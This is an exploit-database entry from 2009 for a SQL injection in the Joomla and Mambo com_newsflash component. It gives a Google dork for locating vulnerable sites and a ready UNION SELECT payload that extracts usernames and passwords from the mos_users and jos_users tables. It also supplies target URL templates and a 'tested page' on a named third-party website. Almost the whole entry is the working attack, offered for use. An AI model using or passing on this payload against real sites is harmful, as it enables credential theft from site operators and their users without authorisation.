Joomla com_newsflash (id) Remote SQL Injection Vulnerability

2009-01-11T00:00:00
ID 1337DAY-ID-4629
Type zdt
Reporter EcHoLL
Modified 2009-01-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Joomla com_newsflash (id) Remote SQL Injection Vulnerability
============================================================


#Joomla newsflash Sql injection#
########################################
#[~] Author : EcHoLL
#[!] Module_Name:  newsflash
#[!] Script_Name: mambo and joomla
#[!] Google_Dork: inurl:"com_newsflash"
########################################
sqlcode:index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
 
mambo target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0
 
joomla target: www.webpage.com/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+jos_users&catid=0
 
 
tested page
http://www.flairsoft.net/main/index.php?option=com_newsflash&id=8+and+1=1+union+select+1,username,password,4+from+mos_users&catid=0



#  0day.today [2016-04-20]  #